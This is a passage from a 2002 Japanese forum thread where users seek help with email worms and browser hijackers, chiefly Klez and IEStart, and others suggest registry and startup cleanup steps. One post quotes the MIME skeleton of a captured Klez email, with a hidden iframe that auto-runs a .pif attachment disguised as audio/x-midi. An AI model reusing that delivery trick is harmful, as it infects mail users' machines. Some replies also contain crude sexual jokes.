and copy overwrite him whit itself.

94 :cheshire-cat:02/03/27 00:42
>>93
>>バスターの未知ウイルスの名前は?
さあ、何だっけ。。。。。

そこ見たら、WG2bの修正版が出てるんだね〜いつの間にか。
一応拾っておく。週末遊びますかぁ。

95 :+anonymous:02/03/27 06:13
>>73
亀だけど。
インターネットオプションから「ホームページ」を書き直すだけでOK。
実はマカフィーが"駆除した"て言った時点でもう既に直ってるんよ。

ていうかとっくに解決してるんだろうけど一応ね…


96 :+anonymous:02/03/27 06:36
>スタートページの設定を元に戻して再起動をかけると

ん??あれれ??これはどうなんだろうか。
インターネットオプションの「ホームページ」を書き直した後に、
ファイル名指定→"regedit"でレジストリエディタを起動させて、
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
の"Startpage"が「ホームページ」で指定したURLになってるかどうか調べてみたほうがいいかも。

で、ちゃんと指定したURLに変ってても再起動したらダメな場合は、
ファイル名指定→"msconfig"で、win.ini→windows→"load= "と"run= "も調べた方がいいかな??
ついでにスタートアップタブ以下も。
でも駆除したってんなら、普通は書き換えられたのを元に戻せばそれでOKなはずなのに。
IEstartは余計な書き込みしないハズだし…

しかしなかなか直らなくてメンドウならば、DOSモードで起動→"scanreg restore"でレジストリをまるまる復元。

とまぁ……なんか、独り言みたいだ(;´Д`)ハァハァ

97 :+anonymous:02/03/27 06:39
↑ぁヮヮ、しかも間違ってる…
×scabreg restore→○scanreg /restore

汚してすいません逝ってきますんで(;´Д`)

98 :+anonymous:02/03/27 06:52
最後っ屁させてくださいおながいします(_ _(--;(_ _(--;)ペコペコ

>>97について

×scanreg restore→○scanreg /restore

に訂正。
垂れ流しのまんまだと気持ち悪いんで…
何度も汚してすいません今度こそ逝ってきますんで(;´Д`)ハァハァ…

99 :名無しさん@お腹いっぱい。:02/03/27 06:58
ほれ http://www.google.co.jp/search?hl=ja&q=WINDOWS+KILL.EXE&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

100 : :02/03/27 07:07
100

101 :cheshire-cat:02/03/27 07:29
おはよう。具合悪くて寝汗凄いっす。

>>98
IESTART、ひょっとしてJSじゃなくてVBSの方だったからかな、駆除失敗って。
だったら「スタートアップフォルダ」に直接vbsファイルが放り込まれるらしいし。
これだと「個別のファイル」だから、アンチウイルスソフトで駆除できずに手動で削除が必要だから。

ネタ元
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_IESTART.B



102 :名無しさん@お腹いっぱい。:02/03/27 15:06
こんなの捕獲した。ファイルサイズは79949
AVG
Program version: 6.0.343
Virus DataBase: 190
では検出できず。

Subject: Darling
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=Yo60Va8b5078n9It29910831k111J11u09v

--Yo60Va8b5078n9It29910831k111J11u09v
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:R7Qn49D6hzlM7lxl7 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--Yo60Va8b5078n9It29910831k111J11u09v
Content-Type: audio/x-midi;
name=この.pif
Content-Transfer-Encoding: base64
Content-ID: <R7Qn49D6hzlM7lxl7>

103 :69:02/03/27 20:51
>>79
メールはポスペ(そのうえマック)で受信しました。
パッチとかセキュリティ関係はまったく手を入れてません。

メーラーがおかしいのかと思い、複数のメーラーでテストしてみましたが
どれも同じ結果でした。ポスペ以外では書類も見えなかったけど・・・。

WINの方で再チャレンジしてみようかな。

104 :cheshire-cat:02/03/27 20:57
>>103
ポスペ使った事ないからわからんけど。
メーラーって、メル受信後にそのメルを鯖に残すか削除するか、設定できるよね。

そこがどうなってるのかが知りたい。

105 :名無しさん@お腹いっぱい。:02/03/27 22:08
>>102
ふむふむ。
MIMEがX-MIDIだとセキュリティ機能働かずに実行されるバグ突いて
pif を実行させようってか。なるほど、実物見るのは初めてだ。

106 :cheshire-cat:02/03/27 22:10
気になって寝られないぞ、おい。

107 :名無しさん@お腹いっぱい。:02/03/27 22:12
trojanっていうのに音楽のファイルを400曲分全部
訳のわからないスクリプトに変えられました。
あと、Outlookを勝手に立ち上げようとばっかりします。
オンラインスキャンでウイルスはなくせたのですが、
だめになってしまった音楽のファイルを
復活させる方法ってあるんでしょうか??

108 :名無しさん@お腹いっぱい。:02/03/27 22:25
>>107
一つの可能性だけど、
・マシンはそのまま、絶対電源落とさない。Windows終了も駄目。
その後
・Final Data ってソフト買ってきてインストールして復活させてみる
・Nortonのファイル復活機能を使ってみる
なんか思いつくけど。
ただまぁ、ファイル上書きされたのだからほぼ絶望的だとは言っておく。

109 :cheshire-cat:02/03/27 22:26
>>107
多分無理。
でも、もしそのファイルをどっかにコピーした時、大本のファイルがあって、それをあとから削除したとするよね。

するとFinalDataで拾えるかもしれない。

110 :名無しさん@お腹いっぱい。:02/03/27 22:37
>>109
フォローありがと。

111 :cheshire-cat:02/03/27 22:49
>>110
漏れもコツコツ集めた金髪画像の大半を失った過去があるから(泣

112 :102:02/03/27 22:53
帰宅してからデスクトップマシンのノートン先生に聞いてみたら、w32.klez.a@mmつーことだった。
添付ファイル名に日本語使えるように進化したらしい。

113 :cheshire-cat:02/03/27 23:02
>>112
検出名がKLEZ.Aのままなんだ。
ちょと違うは全然違うのに。

114 :名無しさん@お腹いっぱい。:02/03/27 23:08
>>113
スマソ、検出名はちょっと違うかも。
いまノートン入れてあるデスクトップは、別OSで作業中だから確認できず。


115 :cheshire-cat:02/03/27 23:12
>>114
漏れもこういうややこしい体験はした事、まずないんだけど。
KLEZ系、微妙に改変された変種が多いし。

ばらまいてるのは、MX関連のヤシなのかな。

116 :可と:02/03/27 23:56
>>115
そうなの?????
じゃあ、ノートン先生頻繁に定義ファイルアップデートしても
全然安心できないじゃにょ?

117 :名無しさん@お腹いっぱい。:02/03/28 00:43
KLEZ.Eだった。

118 :名無しさん@お腹いっぱい。:02/03/28 01:07
アプリケーションを起動する時にほとんど毎回
「●●.exeはメモリ不足のため起動できませんでした」
とか出るんですが一体何なのでしょうか?
↑の●●はいつも英文字と数字のまじったランダムな文字列なんです。
最近TROJ_KLEZ.Eに感染してしまって、自分では駆除し終えたつもりなんですが
もしかしてまだ駆除しきれていないんでしょうか・・・

119 :名無しさん@お腹いっぱい。:02/03/28 01:59
ファイル名書いてなかったら、調べられません。


120 :名無しさん@お腹いっぱい。:02/03/28 02:28
この板はじめてきました。
パソコン初心者です。
ウィルス対策にはなにがいいのでしょう?
どうか教えてください。

121 :名無しさん@お腹いっぱい。:02/03/28 03:08
>>120
アンチウィルスソフト
http://members.tripod.co.jp/eazyfox/SecuTool/AntiVir/AVguard1.htm
上のは無料のアンチウィルスソフト。
メールソフトは、Outlook Expressを使わない。
Windows Updateをする。

122 :118:02/03/28 13:27
>>119
さっき出たのはZQO8315.EXEでした。
でもいつもランダムです・・・

123 :_:02/03/28 13:31
>>122
そのファイル名で検索したけど、情報は見つかりませんでした。
もう一度持っているアンチウィルスソフトでハードディスクの
中全部チェックしてみて。あと、
http://www.trendmicro.co.jp/hcall/index.asp
でウィルスチェックをして。
心配なら、大切なデータを保存して、リカバリすればいい。

124 :_:02/03/28 13:35
http://www.google.com/search?q=cache:I0X5yp_w8IgC:www21.tok2.com/home/winrose/Security.html+TROJ_KLEZ.E&hl=ja&lr=lang_ja

125 :107:02/03/28 18:05
>>107さん
>>108さん
アドバイスありがとうございます。
で・でももう何回も電源落としたり(しかも凍ってしまって
強制終了とか)、パニクって訳わからずいじったりしてしまってました・・・。
これからの参考にさせてもらいます。

126 ::02/03/28 19:02
復元
誤ってごみ箱から削除した
http://www.vector.co.jp/soft/win95/util/se192983.html

127 :69 103:02/03/29 04:59
>>104
もちろん受信後は削除の設定です。

128 :名無しさん@お腹いっぱい。:02/03/29 05:02
助けてください!!!!!!!!!!!!!!!!!!!!!!! 
IEを開くたびエロのHPがでてくるんです。インターネットオプションで
hpアドレス変えても変えても再起動するとリセットされロリHPにつなげられるんですが。
OSは98でケーブル回線です。どうかお願いします。家族に見つかるまで時間ありません
。初心者だもんで半角版でくらいました。


129 :名無しさん@お腹いっぱい。:02/03/29 05:11
>>128
だもんでご愁傷様

130 :_:02/03/29 07:27
>>128
リカバリ。
それか、インターネットオプションの、webの設定のリセット。

131 :cheshire-cat:02/03/29 07:28
>>127
プロバでメールのウイルスチェックしてない?いや、それが原因ではないのかな。

プロバに連絡して、メルボックスを空にしてもらったらどうだろうか。
じゃなければTelnetで入って、自分のメルボックスがどうなってるのか見てみるとか。

132 :cheshire-cat:02/03/29 07:33
>>128
カゼひいて病院いくとこだから、ジャバスク系ウイルスって前提で書くけど。
コピペでスマンが。

<IEを起動したら、トップページがアダルトサイトに>
1-3)JS_EXCEPTION系
HPを見ただけで、IE起動時に表示されるページが変更され、場合によってはQ2(もしくは国際電話)に接続。
ブラウザのセキュリティにて、ジャバスクリプトを有効にしていると感染する。保存したHPのhtmlファイルを閲覧しただけでも危険。様々なタイプが存在する。
アンチウイルスソフトでまずスキャン。
C:\windows\Downloaded Program Filesに、見覚えの無いActiveXコントローラーがあれば削除。

2)レジストリ修復
罠にはまった直後なら、簡単。
スタート→Windowsの終了→MS-DOSモードで再起動。
これが無いなら、電源入れた後F8(機種によってはCtrl)ボタンを押し続け、Command pronpt onlyを選択。
そして「scanreg (半角スペース)/restore」と入力(まさかと思うけど、カッコとカギカッコは入力しない)。
Windows Meなら、スタート→ファイル名を指定して実行にて「scanreg (半角スペース)/restore」
罠にかかる以前の日付のものを選択してEnter(リターンキー)を押す。

3)確認
電話番号書き換えトラップとペアで用いられる事が多い。
デスクトップのIEのマークを、マウス右押し。プロパティを表示。
接続→ダイヤルアップの各設定(電話マーク)を選び、設定→プロパティ。
電話番号の最初の数字が0990や001のものがあるかチェック。

スタート(画面左下)→プログラム→スタートアップより、見覚えの無いものを削除。
Meの共通スタートアップグループc:\windows\all user\スタートメニュー\プログラム\スタートアップのチェック。
スタート→ファイル名を指定して実行→msconfig→スタートアップより、アダルトサイトの名前やアドレスが記載されているものが残っていないかチェック。またその他のタブでも同様にチェック。

IEのプロパティから全般タブを選択し、ホームページがどうなっているのかをチェック。



133 :cheshire-cat:02/03/29 07:34
我ながら、無駄に長いなこのコピペ。
改良の余地があるな。

134 :_:02/03/29 07:34
>>128
オンラインウィルススキャンしなさい。

135 :名無しさん@お腹いっぱい。:02/03/29 08:55
タイトルは;A WinXP patch。「Part 1.1」という添付ファイルがついてて、本文無しって・・・
やっぱウィルスですよね?
環境は、Win-me;エクスプローダーアウトルックと、MAC-OS9.2;ネスケ4.7-ネスケメーラーです。
共にODNのADSL常時。メールのプロバはnifty。恐くてWinでメール受信できない・・・。
MACでメール受信しておけば大丈夫ですよね? Winでも添付を開かなければ大丈夫でしょうか?

海外にいる姉からのメールを受けた直後からこうです。たまに書かれている本文は英語だし。
でもFrom欄はjpアドレス。どうなっているのでしょう?
今では1日4通くらいバラバラに届きます。こんなに頻繁に来るのは良くある事なのでしょうか?

プロバの方でキーワードでメールを弾く設定はしましたけれど、不安です。何か良い対策ありますか?

136 :_:02/03/29 09:43
>>135
ウィルスです。
うんこちゃんウィルス。
タイトルが日本語名。

あっ、違った。それは、マイクロソフトのソフトウェアの
バグ修正パッチを偽ったウィルスかな。

メールソフト、マイクロソフトの使わないほうが良いよ。
edmaxというメールソフトの無料の使うのがいい。

姉がウィルスに感染してるんじゃないのかな?
教えてあげると良いよ。

137 :_:02/03/29 09:46
http://www.trendmicro.co.jp/hcall/index.asp
ここ、ウィルスチェックできるところ。
トレンドマイクロというアンチウィルスソフト
作ってる会社のページ。

138 :_:02/03/29 09:48
http://www.microsoft.com/japan/security/
>マイクロソフトからソフトウェアを提供するかのように偽装した
ワーム(ウィルス)が現在蔓延しています。

139 :_:02/03/29 09:50
http://www.vintage-solutions.com/Japanese/Antivirus/Super/download1.html
アンチドート簡易版。

無料のワクチンソフト。

140 :名無しさん@お腹いっぱい。:02/03/29 10:06
>>135
添付開けないでもウィルスを発動させるテクニックも開発されている。プレビュー切っとけ。
Macなら大丈夫かというとWin3.1が流行る前はMacのウィルスの方が活発だったんだがな。

>海外にいる姉からのメールを受けた直後からこうです。
ウィルスの流行とメールが来たのがたまたま一致したんだろう。

対策法はいくつかある。
製品版のアンチウィルス入れる。サポート有り
プロバのスキャンサービス申し込む。
フリーのアンチウィルス入れる。サポート無し。
経験値を上げて、ウィルスの動作原理を理解する。
姉さんのハァハァJPEGで経験値の高いヤシを雇う。>>135が女なら自分のでも可。(w


141 :名無しさん@お腹いっぱい。:02/03/29 10:42
WIN2000ProでJS/IEStart.gen.cというウイルスに感染しました。
アンチウイルスソフトでファイルを削除し、IEのスタートアップ
ページも治したんです。
それでも再起動をかけるとまた勝手にホームのページを書き換えるので
仕方ないから放置しておくときっかり30分おきにIEが勝手に起動
することが判明しました。

検索でウイルス情報を見ても「ファイルを削除して情報を正しい物に
書き換えれば治る」って書いてあるんだけど、相当しつこいですこのウイルス。

おまけにタイトルバーは変な文字化けしちゃってるし・・・・

なんか良い方法はないですかねー?



142 :名無しさん@お腹いっぱい。:02/03/29 10:50
>>171ガイシュツ このスレの73以降にあり。

143 :142:02/03/29 10:51
スマソ >>171ではなく>>141ね。

144 :勘弁してよ:02/03/29 15:01
http://www.hotwired.co.jp/news/news/technology/story/20020328301.html


145 :名無しさん@お腹いっぱい。:02/03/29 15:23
添付ファイル無しのウィルスメールってあるんでしょうか?



件名 : Fw:Fw>Fw:Fw:Fw>Fw:Fw:Fw>Fw>Fw:Fw:
>テレビの番組でメールが何処まで繋がるかを実験中!スターとは北海道の小樽市の加
藤浩さんです。結果は5/13PM7時鉄腕ダッシュで放送されますチーム名は(長瀬チー
ム)です!これを9人に回して下さい!イタズラではナイのでお願いします!止めない
でネ


こういうメールが家族の名前で送られてきたんですけど。
本人は送った覚えがないと言っています。
誰か教えて〜。


146 :_:02/03/29 15:43
>>145
アドレスは、家族のアドレス?
添付ファイルなしのウィルスもあると思う。

147 :145:02/03/29 15:49
>146
そうです、家族のアドレスから送られてます。
添付ファイル無しってことは、開いただけで感染するって
ことでしょうか?

148 :145:02/03/29 15:51
>146さん、追加
姉からきたメールだったんですが、今朝姉のところにお友達から
一通メールが来て、その数分後に、この件名Fw:Fw>Fw:Fw:Fw・・・
のメールが来たそうです。

149 :cheshire-cat:02/03/29 18:48
>>140
OEでのプレビュー感染ってMS01-020入れればいいかと。

>>145
鉄腕ダッシュのチェーンメールって、かなり有名だと思うんだけど。


150 :名無しさん@お腹いっぱい。:02/03/29 19:25
「bio-net」ってどういう機能のツールでしょうか?
どなたかご存知の方、お教え下さい。   

151 :_:02/03/29 19:27
>>150
検索しろ!>>1を読め!

152 :名無しさん@お腹いっぱい。:02/03/29 23:03
>>149
プレビューしとくと、意思に反した開封確認しちまう可能性がある。


153 :名無し:02/03/30 11:48
happy99ウイルスっつうのが検疫に入ってるんですが
どうすれば?いいのでしょうか?

154 :名無しさん@お腹いっぱい。:02/03/30 11:51
>>153
何もしなくていいからとにかく触っては駄目。
Shift + Delete キーで完全削除すると吉。

155 :名無しさん@お腹いっぱい。:02/03/30 15:13
お前のPCはWin32/Klez.E@mmに感染したよーと
メールが来た。とほほ

体験版落として駆除できますか?

156 : :02/03/30 16:11
>>155
まずやってみれ

157 :名無しさん@お腹いっぱい。:02/03/30 16:18
>>155
濡れ衣だったりして。

158 :井戸端2号:02/03/30 18:03
スミマセン!質問です。
Ctrl+Ali+Delを押すと
D066uutyってあるんですが これ何ですか?

159 :名無しさん@お腹いっぱい。:02/03/30 19:17
>153
今となってはめずらしいので記念に取っておくこと
動かしてもたいした実害はないので試してみれ

160 :名無しさん@お腹いっぱい。:02/03/30 20:39
件名「color」差出人はNiftyのアドレスというのが
2日連続で来て(別アドレス)、今日は「IE6 patch」だった。

「color」ってなんでしょう?
「IE6 patch」は明らかにやばいですよね。

161 :cheshire-cat:02/03/30 21:07
>>160
検出名って何?

162 :名無しさん@お腹いっぱい。:02/03/30 21:57
差出人もタイトルも本文も無くて、
添付ファイルだけ来ました。

PLGDLNPL.EXE

と、書いてあるんですがウィルスでしょうか?
シマンテクとトレンドの両方のサイトで調べたけど
該当するものが無いみたいです。

163 :名無しさん@お腹いっぱい。:02/03/30 22:03
さっき、いれたてのAVG使ってNimdaがあるサイトに行ってみたら、
青い画面になったんです。
その時「access enable」とか言われて「yes」「no」「heal」と選択肢がでたんですけど、
そのままにしといたら何かデスクトップ画面に戻ったんです。

俺はそんときどうすりゃ良かったのか教えてください
今後ウイルスに感染したときのためにも・・・おながいします。


164 :cheshire-cat:02/03/30 22:07
>>162
Hybris.bです。
ファイル名はランダムで、最初の2文字と最後の2文字が同じなので。

165 :名無しさん@お腹いっぱい。:02/03/30 22:11
>>163
no(そのままリターンを押す)を選べばいい。


166 :162:02/03/30 22:12
>164
ありがとうございます。

167 :163:02/03/30 22:20
>>165
ありがとうございます!

でも、今回みたいにそのままにしといた場合でもべつにいいんでしょうか?
あと、今さっきまた青い画面になりましてそのときは、
「heal」を選択してしまったんですが、これも大丈夫なんでしょうか?



168 :名無しさん@お腹いっぱい。:02/03/30 22:40
>>167
healはウィルス除去してくれるはずだが、除去できるような感染サンプルで
試してないのでよくわからん。
除去できない場合はアクセスできなくしているようだ。


169 :163:02/03/30 22:46
>>168
なるほどhealはウイルス除去なんですか
(漏れの場合そのあとのウイルスチェックでは見事にひっかかりました)

あと、そのままにしておいた場合のこともできれば教えてくれるとうれしいのですが・・・

170 :名無しさん@お腹いっぱい。:02/03/30 22:56
>>169
30秒ほっぽっとくと自動的にNOを選択

171 :名無しさん@お腹いっぱい。:02/03/31 02:16
js.spawn  ってなに?

172 :_:02/03/31 04:31
>>171
検索しろ

173 :名無しさん@お腹いっぱい。:02/03/31 11:57
>171
http://www.nai.com/japan/virusinfo/virS2000.asp?v=JS/Spawn

マカフィーしか対応してないのか?それとも別名でつけられているんか?

174 :163:02/03/31 14:20
>>170

ありがとう!

175 :名無しさん@お腹いっぱい。:02/03/31 20:00
おっと、tech@dionsupport.netからKLEZ.G型ウイルスが来たぞ。
試しにhttp://www.dionsupport.netと入力してみたら、、、、、、

.....プロバイダーの一組織がやられるとは、なかなか素晴らしい。


176 :名無しさん@お腹いっぱい。:02/03/31 20:13
【AVG】
感染したとき「NO」を選んでも隔離室にウイルスが送られないので、
いつもいちいちウイルススキャンしてるんですがこれは仕様ですか?
もし対策があればお教えください。

177 :cheshire-cat:02/03/31 20:14
>>175
その検出名、アンチウイルスソフトは何?

178 :cheshire-cat:02/03/31 21:10
Sophosユーザーが居たのか。
ちゅうか放置かい。

179 :名無しさん@お腹いっぱい。:02/04/01 17:36
難しい質問ですが、教えてください。
SEARCHURL.MP3という名前のウイルスは存在しますでしょうか?
またもし存在する場合、どのようなウイルスでしょうか?
ウイルスかもしれないと思うのはあくまでも僕の推測なのですが、
どうでしょうか。

180 : :02/04/01 17:43
>>179
しないと思われ

181 :W32/Badtrans-B:02/04/01 19:57
>>179 http://www.google.co.jp/search?hl=ja&q=SEARCHURL.MP3&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

182 : :02/04/02 16:23
>>175
残念、ハズレ。
KLEZは差出人を詐称するんだよ。

183 :名無しさん@お腹いっぱい。:02/04/02 17:42
KREZって、メールヘッダは全然信用出来ないんですかね
(Receivedの一番上のはこっちのメル鯖が付けるから、これは別にして)
6日発症らしいから教えてあげたいんだけどねぇ。

184 :名無しさん@お腹いっぱい。:02/04/03 01:18
>183
ちゃんとした差出人(友人)で、Klezが届きましたが、なにか。
ウィルスは複雑な動きをしたり、亜種が発生したりするから、
決まったものだと信じないほうが安全。でないと...
・Klezによって、導入してあった駆除ソフトのDLLを消されました。
・新たに導入した駆除ソフトは怪しいexeをすべて消しました。WinMX.exeまで..
・朝の5時までかかって復旧。
とかなっちゃうぞ〜

185 :名無しさん@お腹いっぱい。:02/04/03 01:23
>175
www.symantec.co.jp/region/jp/sarcj/data/w/w32.klez.e@mm.html
の「注意」のところを読んでごら
じつはそのメールはあなたが

>注意:このウイルスが独自のSMTPエンジンを使って送信した
>電子メールが一見「メールサーバーから戻されたメール」に
>見える様式で届いたという報告が幾つか寄せられています。
...

186 :名無しさん@お腹いっぱい。:02/04/03 02:47
>>184
う〜む。うちのメル鯖には、神奈川県下のケーブル会社のドメインから来てる
ことになってるけど、送信元メールアドレスは、神奈川県でサービスしてない
プロバアドレスになってるから、イマイチ決定しないんですよね(勿論、メール
だけ保持して使ってる可能性もないこともないんで、その点からもイマイチ)
可哀想に…(w

ちなみに私はOE使ってないから、こんなメールは屁でもないです
(思いっきりアヤシイ添付だったし…)

187 :Questionnaire:02/04/03 15:24

サブジェクトは"Questionnaire"添付ファイルが"DD70.exe"という
ウィルスメールが届きました。

新種でしょうか?

188 :名無しさん@お腹いっぱい。:02/04/03 15:38
すいませんがどなたか「WORM.KLEZ.E」というウィルスの適切な処理の
仕方を解る方いらっしゃいますか?
トレンドマイクロのウィルスバスターでは駆除、隔離できませんでした。。



189 :名無しさん@お腹いっぱい。:02/04/03 15:43
マルチポストやめれ。初心者質問スレにレスしてやったのに。

190 :名無しさん@お腹いっぱい。:02/04/03 19:24
JPEGファイルを開こうとしても開かなくなりました。
VIWERの代わりに(?)
「rundll32.exe C:\WINDOWS\System32\shimgvw.dll,ImageView_PrintTo /pt "%1" "%2" "%3" "%4"」
が実行されているようです。

これは、ウィルスが発症していると考えて間違いないでしょうか?

191 :cheshire-cat:02/04/03 19:33
>>190
フォルダオプションから、拡張子の割り当てをカエレ。

192 :名無しさん@お腹いっぱい。:02/04/03 19:36
>>190 ウィルスチェックしてみた?アンチウィルスソフト持ってなければ、
http://www.trendmicro.co.jp/hcall/index.asp で。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SIRCAM.A&VSect=T
↑これの可能性あるかも。

193 :cheshire-cat:02/04/03 19:42
>>192
SirCamのrundll32.exeでエクステンションの割り当て、変わるんだろうか。

>>190
ウイルスチェックして、結果報告してほしい。
結果がわかるまで気になって寝られなくなった。

194 :190:02/04/03 20:29
cheshire-catさん、192さん、RESありがとうございます。

先日「KLEZE」入りの添付ファイル(JPEG)付きのメールが
来て、それが原因というか、発端なんです。
(セキュリティソフトにより「検疫」項目に入れられてました。)

そのメールがアクティブになると、「Windows Picture and Fax Viewer
」で画像が開くので、開かないようにできないかと思い・・・。
フォルダオプションの詳細設定を覗き、少しいじってしまいました。
(といっても、致命的なことはやっていないつもりなのですが・・・。
やめておけばよかったっぽいです(涙)。)

ウィルススキャン、時間がかかっています。終わったら報告するつ
もりですが、深夜になるかもしれません。すみません。
いまのところ感染はないようです。

195 :cheshire-cat:02/04/03 20:37
>>194
そりゃめんどいかも。
一つ一つエクステンションごとに設定するのって、面倒だし。

ちゅうか
>そのメールがアクティブになると
まだ駆除できてないんかい!
LANカード抜いて、アンチウイルスソフト一旦落として、それからメーラーで該当メル削除→削除済みメールも削除。
それからアンチウイルスソフト使えばどうだろうか。

ちゅうか、scanreg /restoreでダメ?

196 :190:02/04/03 20:59
ごめんなさい! わかった・・・気がします。

openアクションのアプリケーションのところに、誤って
printtoアクションのアプリケーション実行ライン
「rundll32.exe C:\WINDOWS\System32\shimgvw.dll,ImageView_PrintTo /pt "%1" "%2" "%3" "%4"」
つまりこれ(↑)をコピーしてしまっていたのです!

http://www.vector.co.jp/soft/win95/util/se225231.html」で、
「TIFFファイルの標準ビューワが、Win2kでは、イメージング
C:\Program Files\Windows NT\Accessories\ImageVue\kodakimg.exe
だったものが、WinXPでは、Windows画像とFAXビューワrundll32.exe
C:\WINDOWS\System32\shimgvw.dll,ImageView_Fullscreenに変更さ
れました。」という記述を見つけまして・・・。

ウィルスじゃなかったみたいです。お騒がせして申し訳ございません
でした! ほんとごめんなさい!です。

197 :cheshire-cat:02/04/03 21:06
>>196
いえいえ、こちらも勉強になりました。
ウイルス絡みだと、どうしても何をどうしていいのかわからなくなりますよね。
人柱、ご苦労様です。
あなたのおかげで、何人もの利用者が、今後救われます。

198 :名無しさん@お腹いっぱい。:02/04/03 21:13
誰か Klez専用スレが どこにあるかわかりませんか?

199 :190:02/04/03 21:25
もう、ほんとに・・・お恥ずかしい限りです(汗)。
焦りまくってパニック状態でしたが、親切なアドバイスを
いただきながらでしたので、不安に耐えられたと思います。
cheshire-catさん、どうもありがとうございました。

200 :cheshire-cat:02/04/03 21:26
>>198
KLEZにはうるさい漏れなんだが。

現在ノートン等でKLEZ.Eって検出される変種、漏れ4つ持ってます。
それぞれ挙動やファイルサイズが全然違います。

定石としてレジストリの書き込みをチェックして(それぞれ該当ファイル名の名前が違うから)、該当ファイルを見つけ削除するようにお勧めします。

201 :名無しさん@お腹いっぱい。:02/04/03 22:49
さっきふと気がつくと、不特定多数のプログラムやWindowsの設定画面等の
ウインドウ上部の青いタイトルバーのところに、変なふざけた言葉が
常にくっついてる状態になっていて、

例えばIEを開くと、「Internet Explorer」と表示されてるところが
「Internet悲しい目をした犬」とか、オプションを開くと
「インターネットオプションの父です」とか他にもランダムでいろいろ変な言葉が。
再起動しても消えないし、いつからそうなったのかわかりかねるので、
とりあえずシステムの復元(WinMe)で数日前の状態に戻したらなくなりました。
それでオンラインウイルス検索をしてみたんですが何もひっかかりません。
原因を探そうと最近入手したプログラム等をいくつか実行して同じ症状が出るか
確認したんですが出てきませんでした。

こういう症状を引き起こすプログラムについて何か情報知っている方いますか?

202 : :02/04/03 22:51
>>201
それ飽きたんだけど、、、

203 :201:02/04/04 00:29
>>202
そう言われて自分の調べ方が甘かったかと思い(質問前もかなり調べたつもりだが)
もう一度、この板はもちろん初級ネット板やPC初心者板の質問関係スレを今まで
ずっとぐるぐるめぐってたけど全然同じ質問見つからない。

唯一初級ネット板で質問してるヤツ一人見つけたけど、こいつのマルチポストが
ばれたせいで「窓の手で修正しろ」と言われただけでシカトされてるし。

204 :名無しさん@お腹いっぱい。:02/04/04 01:14
トレンドマイクロ、ウイルス感染被害マンスリーレポート 【3月度】発表(4/3)。
http://www.trendmicro.co.jp/virusinfo/report/mvr020403.asp
先月5位から3位に浮上。

IPAは、「W32/Klez」ウイルスの亜種に関する情報 (4/2)。
http://www.ipa.go.jp/security/topics/newvirus/klez.html

再流行のきざしか。

家族でPCを使っているそこのお父さん、
Outlook(Express)をメーラにしているならお子さんにも注意しといてね。
「開く」を押したらだめだぞぉ、って。(警告でるようになっていても無意味)

205 :名無しさん@お腹いっぱい。:02/04/04 01:15
>>203
>もう一度、この板はもちろん初級ネット板やPC初心者板の質問関係スレを今まで
>ずっとぐるぐるめぐってたけど全然同じ質問見つからない。

うそつけ

206 :204:02/04/04 01:24
>204
あっ Klez クレズ の話ね。
次から自動修正ツールに行けます。私はこれはためしてないけど。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.A

WORM_KLEZは駆除はできませんとのことです。つまり感染したexeは消すしかないようです。
AVGも消しちゃうようです。


207 :名無しさん@お腹いっぱい。:02/04/04 01:29
>>205
本当だヴォケ

208 :名無しさん@お腹いっぱい。:02/04/04 01:33
>204
ていうか
ネスケでも何でもいいから
M$以外のものを使うようにしてくれ・・・

209 :名無しさん@お腹いっぱい。:02/04/04 01:54
>>207
■ 初心者用質問スレッド Part8 ■
http://pc.2ch.net/test/read.cgi?bbs=sec&key=1014880309
より引用

675 名前:名無しさん@お腹いっぱい。 E-mail: 投稿日:02/03/24 17:12
いつの間にか自宅の Internet Explorer が 小林カツ代エクスプローラ に
なっちゃったんですけど、どうしたらいいんでしょうか。

871 名前:名無しさん@お腹いっぱい。 E-mail:sage 投稿日:02/04/01 00:16
教えて君で申し訳ありませんが、質問させてください。
うちのIEは何故か、上の青枠の中のタイトルの横が
「InternetExplorer]の代わりに「小林カツ代エクスプローラ」という文字が出ます。
先週か先々週の頭くらいからなのですが……これはどういう事なのでしょうか?

メガネかけろ

210 :jinngai :02/04/04 01:58
スパイウェアのalexaなんですが、
何のソフトについてるんでしょうか?
前にリストが載ってるサイトを
見つけたのですがいまはノットふぁうんどに・・・

211 :名無しさん@お腹いっぱい。:02/04/05 22:30
  

212 :名無しさん@お腹いっぱい。:02/04/05 22:59
Hola como estas ?

Te mando este archivo para que me des tu punto de vista

Nos vemos pronto, gracias.



ウィルスのくせに英語以外の言葉使うなよ・・・なんだかわからん。

213 : :02/04/05 23:05


214 :名無しさん@お腹いっぱい。:02/04/06 12:17
>>212
スペイン語だお。


これらとしてこんにちは?
あなたが私にあなたの見地を与えるように、私はあなたにこのファイルを送る
我々はまもなくお互いに会う、ありがとう。

・・・・・・・・・むぅ、やっぱり機械翻訳では無理があるな。

215 :名無しさん@お腹いっぱい。:02/04/06 13:14
>>209
小林カツ代エクスプローラー

氏ぬほどワラタ

216 :69 103 とか:02/04/06 19:41
>>131
cheshire-catさん

いろいろ話を聞いてくださってありがとうございました。
サーバのメールBOXを新しいものに変えて、おかしいBOXは削除しました。
こないだは同じ名前でBOX作ったら変化無しだったのですが、
ほんとに新しいBOXにしたら今のところ問題無いみたいです。
お礼が遅くなってごめんなさい。


217 :cheshire-cat:02/04/06 22:14
>>216
いえいえ、あまりお力にもなれずにすまんっす。
えとですね、書いちゃうけど。

設定が変なメル鯖って多いんですよ。
例えばちょっと話が変な方向に飛ぶけど。
Badtrans.Bみたいにメル本文にウイルスコードが記載されてると、アンチウイルスソフトはそれを削除するけど、その後「接続しっぱなし」、の変な状態になる、とか。一定時間後に強制ログアウトすればいいのにと思うけど。

実際、管理者はこの手のトラブル、ユーザーからのフィードバックが無いと気付かないんですね。
どんどん訴えてもいいと思います。

218 :cheshire-cat:02/04/06 22:24
あの、またつまらん質問なんですけど。

